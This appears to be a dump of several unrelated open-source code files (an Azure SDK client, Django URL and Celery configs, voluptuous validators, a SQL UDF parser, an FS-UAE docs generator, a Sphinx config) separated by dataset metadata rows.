pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
async def get(
self,
resource_group_name: str,
host_group_name: str,
expand: Optional[str] = "instanceView",
**kwargs: Any
) -> "_models.DedicatedHostGroup":
"""Retrieves information about a dedicated host group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param host_group_name: The name of the dedicated host group.
:type host_group_name: str
:param expand: The expand expression to apply on the operation. The response shows the list of
instance view of the dedicated hosts under the dedicated host group.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DedicatedHostGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'hostGroupName': self._serialize.url("host_group_name", host_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('DedicatedHostGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups/{hostGroupName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.DedicatedHostGroupListResult"]:
"""Lists all of the dedicated host groups in the specified resource group. Use the nextLink
property in the response to get the next page of dedicated host groups.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DedicatedHostGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DedicatedHostGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/hostGroups'} # type: ignore
def list_by_subscription(
self,
**kwargs: Any
) -> AsyncIterable["_models.DedicatedHostGroupListResult"]:
"""Lists all of the dedicated host groups in the subscription. Use the nextLink property in the
response to get the next page of dedicated host groups.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DedicatedHostGroupListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.DedicatedHostGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DedicatedHostGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DedicatedHostGroupListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/hostGroups'} # type: ignore
|
mit
| -3,765,282,343,104,155,000
| 48.273563
| 180
| 0.646776
| false
| 4.315281
| true
| false
| false
|
dazhaoniel/1kg-more
|
js1kg/urls.py
|
1
|
3537
|
from django.conf.urls import url, include
from django.views.generic import TemplateView
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse_lazy
from rest_framework import routers
from js1kg.corporate import views as corporate_views
from js1kg.message import views as message_views
from js1kg.project import views as project_views
from js1kg.organization import views as organization_views
from js1kg.user import views as user_views
from js1kg.trip import views as trip_views
from js1kg.api import api
from . import views
# For Development Only
from django.conf import settings
from django.conf.urls.static import static
# REST API
router = routers.DefaultRouter()
router.register(r'^organizations', api.NonProfitOrganizationsViewSet)
router.register(r'^projects', api.ProjectsViewSet)
router.register(r'^users', api.UsersViewSet)
router.register(r'^threads', api.MessageThreadsViewSet)
router.register(r'^messages', api.MessagesViewSet)
router.register(r'^admins', api.OrgAdminsViewSet)
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'user/login.html'}, name='js1kg_login'),
url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': reverse_lazy('index')}, name='js1kg_logout'),
url(r'^register/$', user_views.register, name='user_register'),
url(r'^api/', include(router.urls)),
# Password Reset
# Organizations
# url(r'^organization/$', organization_views.organization_main, name='organization'),
url(r'^organization/$', TemplateView.as_view(template_name="organization/organization_main.html"), name='organization'),
url(r'^organization/create/$', login_required(organization_views.organization_create), name='organization_create'),
url(r'^organization/(?P<pk>[-\w]+)/edit/$', organization_views.OrganizationUpdate.as_view(), name='organization_update'),
url(r'^organization/(?P<slug>[-\w]+)/$', organization_views.organization_detail),
# url(r'^project/(?P<queryview>[\w-]+)/$', organization_views.organization_projects),
# Projects
# url(r'^project/$', project_views.project_main, name='project'),
url(r'^project/$', TemplateView.as_view(template_name="project/project_main.html"), name='project'),
url(r'^project/create/$', login_required(project_views.ProjectCreate.as_view()), name='project_create'),
url(r'^project/(?P<pk>[-\w]+)/edit/$', login_required(project_views.ProjectUpdate.as_view()), name='project_update'),
url(r'^project/(?P<pk>[-\w]+)/$', project_views.project_detail),
# User
url(r'^user/$', user_views.user_main, name='my_profile'),
url(r'^user/settings/$', user_views.user_settings, name='user_settings'),
url(r'^user/([a-zA-Z0-9-]{1,32})/$', user_views.other_profile, name='user_profile'),
# Messages
url(r'^messages/$', message_views.messages, name='my_inbox'),
url(r'^messages/(?P<pk>[-\w]+)/$', message_views.message_thread),
# Trips
url(r'^trip/$', trip_views.trip_main, name='my_trip'),
url(r'^trip/(?P<pk>[-\w]+)/$', trip_views.trip_detail),
# Corporate
url(r'^about/$', TemplateView.as_view(template_name="corporate/about.html"), name='about'),
# url(r'^contact-us/$', corporate_views.contact, name='contact_us'),
url(r'^style/$', TemplateView.as_view(template_name="corporate/style.html"), name='style_guide'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # For Development Only
|
apache-2.0
| 2,167,665,762,157,306,400
| 46.797297
| 125
| 0.704552
| false
| 3.491609
| false
| false
| false
|
jtaghiyar/single_cell_lims
|
elastidjango/celery.py
|
1
|
1033
|
"""
Created on Oct 27, 2016
@author: Jafar Taghiyar (jtaghiyar@bccrc.ca)
"""
from __future__ import absolute_import
import os
#============================
# Celery imports
#----------------------------
from celery import Celery
#============================
# Django imports
#----------------------------
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'elastidjango.settings')
from django.conf import settings # noqa
#============================
# main
#----------------------------
app = Celery('elastidajngo')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
# A common practice for reusable apps is to define all tasks in a separate
# tasks.py module, and this is how Celery autodiscovers these modules
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
# @app.task(bind=True)
# def debug_task(self):
# print('Request: {0!r}'.format(self.request))
|
mit
| 4,008,024,806,926,323,000
| 25.512821
| 74
| 0.621491
| false
| 3.742754
| false
| false
| false
|
alecthomas/voluptuous
|
voluptuous/util.py
|
3
|
3150
|
import sys
from voluptuous.error import LiteralInvalid, TypeInvalid, Invalid
from voluptuous.schema_builder import Schema, default_factory, raises
from voluptuous import validators
__author__ = 'tusharmakkar08'
def _fix_str(v):
if sys.version_info[0] == 2 and isinstance(v, unicode):
s = v
else:
s = str(v)
return s
def Lower(v):
"""Transform a string to lower case.
>>> s = Schema(Lower)
>>> s('HI')
'hi'
"""
return _fix_str(v).lower()
def Upper(v):
"""Transform a string to upper case.
>>> s = Schema(Upper)
>>> s('hi')
'HI'
"""
return _fix_str(v).upper()
def Capitalize(v):
"""Capitalise a string.
>>> s = Schema(Capitalize)
>>> s('hello world')
'Hello world'
"""
return _fix_str(v).capitalize()
def Title(v):
"""Title case a string.
>>> s = Schema(Title)
>>> s('hello world')
'Hello World'
"""
return _fix_str(v).title()
def Strip(v):
"""Strip whitespace from a string.
>>> s = Schema(Strip)
>>> s(' hello world ')
'hello world'
"""
return _fix_str(v).strip()
class DefaultTo(object):
"""Sets a value to default_value if none provided.
>>> s = Schema(DefaultTo(42))
>>> s(None)
42
>>> s = Schema(DefaultTo(list))
>>> s(None)
[]
"""
def __init__(self, default_value, msg=None):
self.default_value = default_factory(default_value)
self.msg = msg
def __call__(self, v):
if v is None:
v = self.default_value()
return v
def __repr__(self):
return 'DefaultTo(%s)' % (self.default_value(),)
class SetTo(object):
"""Set a value, ignoring any previous value.
>>> s = Schema(validators.Any(int, SetTo(42)))
>>> s(2)
2
>>> s("foo")
42
"""
def __init__(self, value):
self.value = default_factory(value)
def __call__(self, v):
return self.value()
def __repr__(self):
return 'SetTo(%s)' % (self.value(),)
class Set(object):
"""Convert a list into a set.
>>> s = Schema(Set())
>>> s([]) == set([])
True
>>> s([1, 2]) == set([1, 2])
True
>>> with raises(Invalid, regex="^cannot be presented as set: "):
... s([set([1, 2]), set([3, 4])])
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except Exception as e:
raise TypeInvalid(
self.msg or 'cannot be presented as set: {0}'.format(e))
return set_v
def __repr__(self):
return 'Set()'
class Literal(object):
def __init__(self, lit):
self.lit = lit
def __call__(self, value, msg=None):
if self.lit != value:
raise LiteralInvalid(
msg or '%s not match for %s' % (value, self.lit)
)
else:
return self.lit
def __str__(self):
return str(self.lit)
def __repr__(self):
return repr(self.lit)
def u(x):
if sys.version_info < (3,):
return unicode(x)
else:
return x
|
bsd-3-clause
| 5,798,480,879,912,180,000
| 18.444444
| 72
| 0.51619
| false
| 3.469163
| false
| false
| false
|
google/sample-sql-translator
|
sql_parser/func.py
|
1
|
3624
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dataclasses import dataclass
from typing import Optional
from typing import List
from rfmt.blocks import LineBlock as LB
from rfmt.blocks import IndentBlock as IB
from rfmt.blocks import TextBlock as TB
from rfmt.blocks import StackBlock as SB
from rfmt.blocks import WrapBlock as WB
from .utils import comments_sqlf
from .const import SQLString
from .ident import SQLIdentifier
from .node import SQLNode
from .node import SQLNodeList
from .expr import SQLExpr
from .types import SQLType
from .types import SQLNamedType
@dataclass(frozen=True)
class SQLFunction(SQLNode):
name: SQLIdentifier
params: SQLNodeList[SQLNode]
retval: Optional[SQLNode]
impl: SQLNode
comments: List[str]
def sqlf(self, compact):
# Start the stack with comments
stack = comments_sqlf(self.comments)
# Get params as a list of sqlf
paramf = []
for param in self.params[:-1]:
paramf.append(LB([param.sqlf(compact), TB(',')]))
if self.params:
paramf.append(self.params[-1].sqlf(compact))
stack.append(LB([
TB('CREATE TEMPORARY FUNCTION '),
self.name.sqlf(True),
TB('('),
WB(paramf, sep=' '),
TB(')')
]))
if self.retval:
stack.append(LB([TB('RETURNS '),
self.retval.sqlf(compact)]))
if isinstance(self.impl, SQLString):
stack.append(TB('LANGUAGE js AS'))
stack.append(IB(LB([
self.impl.sqlf(compact), TB(';')
])))
else:
stack.append(TB('AS'))
stack.append(IB(LB([self.impl.sqlf(compact),
TB(';')])))
stack.append(TB(''))
return SB(stack)
@staticmethod
def consume(lex) -> 'Optional[SQLFunction]':
if not (lex.consume(['CREATE', 'TEMP']) or
lex.consume(['CREATE', 'TEMPORARY'])):
return None
comments = lex.get_comments()
lex.expect('FUNCTION')
name = (SQLIdentifier.consume(lex) or
lex.error('Expected UDF name'))
lex.expect('(')
params = []
while True:
var_name = SQLIdentifier.parse(lex)
ltype = SQLType.parse(lex)
params.append(SQLNamedType(var_name, ltype))
if not lex.consume(','):
break
lex.expect(')')
rtype = None
# Javascript function
if lex.consume('RETURNS'):
rtype = SQLType.parse(lex)
lex.expect('LANGUAGE')
lex.expect('JS')
lex.expect('AS')
impl = (SQLString.consume(lex) or
lex.error('Expected Javascript code'))
# SQL-expression
else:
lex.expect('AS')
impl = SQLExpr.parse(lex)
comments.extend(lex.get_comments())
return SQLFunction(name, SQLNodeList(params),
rtype, impl, comments)
|
apache-2.0
| 3,897,709,106,737,068,000
| 27.992
| 78
| 0.586093
| false
| 4.049162
| false
| false
| false
|
FrodeSolheim/fs-uae
|
docs/scripts/update.py
|
1
|
17476
|
#!/usr/bin/env python3
import os
import shutil
import sys
try:
import markdown
except ImportError:
markdown = None
if not os.path.exists("docs/scripts"):
print("Run this script from the project root directory")
sys.exit(1)
last_main_option = ""
last_main_option_added = False
option_data = {}
option_data_all = {}
options = {}
option_repl = {}
f = open("doc/options.html", "w", encoding="UTF-8")
if not os.path.exists("doc/dist"):
os.makedirs("doc/dist")
def handle_option_data(name, data, option):
global last_main_option, last_main_option_added
since = ""
see = ""
default = ""
example = ""
example2 = ""
option["type"] = ""
text = []
h_name = name.replace("-", "_")
name = name.replace("_", "-")
data = data.strip()
org_lines = data.split("\n")
lines = []
in_code = False
in_test = False
for line in org_lines:
if ":" in line or line.startswith("##"):
if line.startswith("##"):
key = line.strip("# ")
value = ""
else:
key, value = line.split(":", 1)
key = key.lower().strip()
value = value.strip()
if key == "since":
since = value
continue
elif key == "see":
see = value
continue
elif key == "default":
default = value
option["default"] = value
continue
elif key == "example":
# example = value
example2 = value
continue
elif key == "type":
option["type"] = value
continue
elif key == "range":
mi, ma = value.split(" - ")
option["min"] = mi.strip()
option["max"] = ma.strip()
continue
elif key == "description":
if value.startswith('"'):
value = value.strip('"')
option["summary_translation"] = True
else:
option["summary_translation"] = False
option["summary"] = value
continue
elif key == "summary":
if value.startswith('"'):
value = value.strip('"')
option["summary_translation"] = True
else:
option["summary_translation"] = False
option["summary"] = value
continue
elif key == "code":
in_code = True
continue
elif key == "tests":
in_code = False
elif key.startswith("test "):
in_code = False
in_test = 1
elif key == "input":
in_code = False
in_test = 1
elif key == "output":
in_test = 2
elif key == "value":
if " - " in value:
value, summary = value.split(" - ", 1)
else:
summary = ""
try:
n, desc = value.split("(", 1)
except ValueError:
n, desc = value, value
else:
n = n.strip()
desc = desc[:-1].strip()
# FIXME: use summary
option["values"].append((n, desc))
# continue
if in_code:
option["code"].append(line[4:])
elif in_test == 1:
pass
elif in_test == 2:
pass
else:
lines.append(line)
# text.append("\n<h2 id=\"{hname}\">"
# "{hname}<a name=\"{name}\"></a></h2>\n".format(
# name=name, hname=h_name))
text.append("<h1>{hname}</h1>\n".format(name=name, hname=h_name))
if since:
text.append("<p>")
text.append("<i>Since {since}</i>.".format(since=since))
if default:
if since:
text.append(" ")
else:
text.append("<p>")
text.append("Default value: {default}".format(default=default))
if example:
if default:
text.append(", ")
elif since:
text.append(" ")
else:
text.append("<p>")
text.append("Example:")
if since or default or example:
text.append("</p>\n")
if example2:
text.append(
"<pre>Example: {hname} = {value}</pre>\n".format(
name=name, hname=h_name, value=example2
)
)
in_list = False
# in_para = False
# in_value = False
last_was_line = False
has_started = False
for line in lines:
if not line.strip() and not has_started:
continue
has_started = True
if (line.startswith("*") or line.startswith("Value:")) or (
in_list and line.startswith(" ")
):
started = False
if not in_list:
started = True
text.append("<ul>\n")
in_list = True
if line.startswith("*") or line.startswith("Value:"):
if not started:
text.append("</li>\n")
text.append("<li>")
else:
text.append(" ")
if line.startswith("Value:"):
if "(" in line:
line = line.split("(")[0][6:].strip()
else:
line = line[6:].strip()
line += " - "
else:
line = line[1:].strip()
text.append(line)
last_was_line = False
else:
if in_list:
text.append("</li>\n</ul>\n")
in_list = False
# if not line.strip():
# text.append("<p>")
# else:
if last_was_line:
if text[-1] == "":
text.append("\n\n")
else:
text.append(" ")
if line.startswith(" "):
text.append("<pre>{0}</pre>".format(line.strip()))
last_was_line = False
else:
text.append(line)
last_was_line = True
if in_list:
text.append("</li>\n</ul>\n")
in_list = False
if see:
# text.append('\n<p>See <a href="#{see}">{see}</a></p>\n'.format(
# see=see))
text.append(
'\n<p>See <a href="{see_l}">{see}</a></p>\n'.format(
see=see, see_l=see.replace("_", "-")
)
)
t = "".join(text)
t = t.replace("\n\n\n", "\n\n")
while " " in t:
t = t.replace(" ", " ")
t = t.replace("</pre><pre>", "\n")
for key, value in option_repl.items():
t = t.replace(key, value)
if "</h2>\n\n<p>See" in t and last_main_option in t:
if last_main_option_added:
f.write(", ")
else:
f.write("\n\nSimilar options: ")
f.write(
'<a name="{name}"></a><a name="{hname}"></a>{hname}'.format(
name=name, hname=h_name
)
)
last_main_option_added = True
else:
last_main_option = name
last_main_option_added = False
f.write(t)
# f.write("\n")
codes = {}
class Code:
def __init__(self):
self.dependencies = None
self.marked = False
def handle_code(option, lines):
# print("handle_code", option)
inputs = set()
for line in lines:
line = line.replace("(", " ")
line = line.replace(")", " ")
line = line.replace(",", " ")
line = line.replace(":", " ")
words = line.split(" ")
for word in words:
word = word.strip()
if not word:
continue
# if word[-1] in "):":
# word = word[:-1]
if word.startswith("c."):
name = word[2:]
name = name.split(".")[0]
if name != option:
inputs.add(name)
inputs = sorted(inputs)
code = Code()
code.option = option
code.inputs = sorted(inputs)
code.lines = lines
codes[option] = code
print(" ", code.inputs)
def handle_option_file(name, path):
print(name)
if os.path.isfile(path):
with open(path, "r", encoding="UTF-8") as option_f:
original_name = name
if original_name.endswith(".md"):
name = name[:-3]
option = {"values": [], "default": "", "code": [], "tests": []}
option_text = option_f.read()
handle_option_data(name, option_text, option)
if option["code"]:
handle_code(name, option["code"])
if "summary" in option:
option_data[name] = option
option_data_all[name] = option
if original_name.endswith(".md") and markdown is not None:
if not os.path.exists("doc/html"):
os.makedirs("doc/html")
html_path = "doc/html/" + name + ".html"
with open(html_path, "w", encoding="UTF-8") as html_f:
html = markdown.markdown(option_text)
html_f.write(html)
def main():
global f
f.write("This page documents the options you can use in FS-UAE ")
f.write('<a href="/fs-uae/configuration-files">configuration files</a>. ')
f.write("The options are sorted in alphabetical order.")
# f.write(" Both hyphens and ")
# f.write("underscores can be used/mixed in option names.")
f.write("\n")
for name in os.listdir("docs/options"):
if name == ".gitignore":
continue
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options", name)):
option_name = name
if name.endswith(".md"):
option_name, _ = os.path.splitext(name)
options[option_name] = os.path.join("docs/options", name)
# option_repl["[{0}]".format(name)] = "<a href=\"#{0}\">{0}</a>".format(name)
option_repl["[{0}]".format(name)] = '<a href="{0}">{1}</a>'.format(
name.replace("_", "-"), name
)
for name in os.listdir("docs/options/launcher"):
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options/launcher", name)):
options[name] = os.path.join("docs/options", "launcher", name)
for name in os.listdir("docs/options/arcade"):
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options/arcade", name)):
options[name] = os.path.join("docs/options", "arcade", name)
for name in os.listdir("docs/options/fsgs"):
if name.endswith("~"):
continue
if os.path.isfile(os.path.join("docs/options/fsgs", name)):
options[name] = os.path.join("docs/options", "fsgs", name)
for name in sorted(options.keys()):
if name == "Makefile":
continue
f = open("doc/dist/" + name, "w", encoding="UTF-8")
handle_option_file(name, options[name])
f.close()
with open(
"../fs-uae-launcher-private/fsgamesys/options/constants.py", "w", encoding="UTF-8"
) as f:
f.write(
"""\
# Automatically generated - do not edit by hand
# noinspection SpellCheckingInspection
"""
)
for key in sorted(option_data_all.keys()):
# Strip leading __ because that will invoke Python's
# name mangling feature
f.write('{} = "{}"\n'.format(key.upper().strip("__"), key))
with open(
"../fs-uae-launcher-private/fsgamesys/options/option.py", "w", encoding="UTF-8"
) as f:
f.write(
"""\
# Automatically generated - do not edit by hand
# noinspection SpellCheckingInspection
class Option(object):
\"\"\"Constants for option names.\"\"\"
"""
)
for key in sorted(option_data_all.keys()):
# Strip leading __ because that will invoke Python's
# name mangling feature
f.write(' {} = "{}"\n'.format(key.upper().strip("__"), key))
with open(
"../fs-uae-launcher-private/launcher/option.py", "w", encoding="UTF-8"
) as f:
f.write(
"""\
# Automatically generated - do not edit by hand
from fsgamesys.options.option import Option as BaseOption
# noinspection PyClassHasNoInit
class Option(BaseOption):
@staticmethod
def get(name):
return options[name]
# noinspection PyPep8Naming
def N_(x):
return x
options = {
"""
)
for key in sorted(option_data.keys()):
print(key)
option = option_data[key]
f.write(" Option.{0}: {{\n".format(key.upper()))
f.write(' "default": "{0}",\n'.format(option["default"]))
if len(option["summary"]) == 0:
f.write(' "description": "",\n')
else:
if key.startswith("uae_"):
f.write(' "description":')
if len(option["summary"]) < 50:
f.write(" ")
else:
if option["summary_translation"]:
f.write(' "description": N_(')
else:
f.write(' "description": (')
if len(option["summary"]) >= 50:
f.write("\n ")
if key.startswith("uae_"):
f.write('"{0}",\n'.format(option["summary"]))
else:
f.write('"{0}"),\n'.format(option["summary"]))
f.write(' "type": "{0}",\n'.format(option["type"]))
if len(option["values"]) > 0:
f.write(' "values": [\n')
for name, desc in option["values"]:
if desc.startswith('"'):
if key.startswith("uae_"):
desc = "{0}".format(desc)
else:
desc = "N_({0})".format(desc)
else:
desc = '"{0}"'.format(desc)
f.write(' ("{0}", {1}),\n'.format(name, desc))
f.write(" ]\n")
if "min" in option:
f.write(' "min": {0},\n'.format(option["min"]))
if "max" in option:
f.write(' "max": {0},\n'.format(option["max"]))
f.write(" },\n")
f.write("}\n")
update_codes()
def update_code_dependencies(code):
# print(sorted(codes.keys()))
if code.dependencies is not None:
return
code.dependencies = set()
code.dependencies.update(code.inputs)
for dependency in code.inputs:
code2 = codes[dependency]
update_code_dependencies(code2)
code.dependencies.update(code2.dependencies)
def write_option(f, option):
code = codes[option]
for dependency in sorted(code.dependencies):
write_option(f, dependency)
if not code.marked:
code.marked = True
f.write(" _{0}(c, f)\n".format(option))
def update_codes():
for option, code in codes.items():
update_code_dependencies(code)
with open("doc/options2.py", "w") as f:
f.write("# Automatically generated - do not edit by hand\n")
f.write("\n")
for option in sorted(codes.keys()):
code = codes[option]
f.write(
"\n# noinspection PyUnusedLocal,"
"SpellCheckingInspection,PyUnresolvedReferences\n"
)
f.write("def _{0}(c, f):\n".format(option))
if option.startswith("int_"):
f.write(" # noinspection PyUnresolvedReferences\n")
f.write(" if c.{0}.explicit:\n".format(option))
f.write(
' f.fail("{0} was set explicitly")\n'.format(option)
)
uses_value = False
for line in code.lines:
if not line.strip():
continue
if "value = " in line:
uses_value = True
f.write(" {0}\n".format(line))
if line.strip().startswith("f.fail("):
f.write(line.split("f.fail(")[0])
f.write(' raise Exception("Failed")\n')
if uses_value:
f.write(" c.{0} = value\n".format(option))
f.write("\n")
f.write(
"""\
class AbstractExpandFunctions:
@staticmethod
def matches(a, b):
pass
@staticmethod
def fail(message):
pass
@staticmethod
def warning(message):
pass
@staticmethod
def lower(s):
pass
"""
)
f.write("\ndef expand_config(c, f):\n")
f.write(" assert isinstance(f, AbstractExpandFunctions)\n")
for option in sorted(codes.keys()):
write_option(f, option)
shutil.move(
"doc/options2.py", "../fs-uae-launcher-private/launcher/ui/config/expand.py"
)
if __name__ == "__main__":
main()
|
gpl-2.0
| -654,725,747,254,878,300
| 30.545126
| 90
| 0.463493
| false
| 4.050997
| true
| false
| false
|
openstack/python-senlinclient
|
doc/source/conf.py
|
1
|
2408
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# python-senlinclient documentation build configuration file
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'openstackdocstheme',
]
# The content that will be inserted into the main body of an autoclass
# directive.
autoclass_content = 'both'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# openstackdocstheme options
openstackdocs_repo_name = 'openstack/python-senlinclient'
openstackdocs_bug_project = 'python-senlinclient'
openstackdocs_bug_tag = ''
copyright = 'OpenStack Contributors'
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'openstackdocs'
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'senlin', 'OpenStack Senlin command line client',
['OpenStack Contributors'], 1),
]
|
apache-2.0
| 1,665,903,313,054,131,200
| 33.4
| 79
| 0.69892
| false
| 4.13036
| false
| false
| false
|
gregplaysguitar/django-trolley
|
cart/views.py
|
1
|
17305
|
# -*- coding: utf-8 -*-
import simplejson
from django.http import HttpResponse, HttpResponseNotAllowed, HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import get_object_or_404
from django.conf import settings
from django.template.loader import get_template
from django.template.loader import render_to_string
from django.template.loader import TemplateDoesNotExist
from django.core.mail import send_mail
from django.core.mail import EmailMultiAlternatives
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.utils import importlib
from django.views.decorators.cache import never_cache
from django.contrib.contenttypes.models import ContentType
from api import ItemAlreadyExists
from utils import form_errors_as_notification, get_current_site
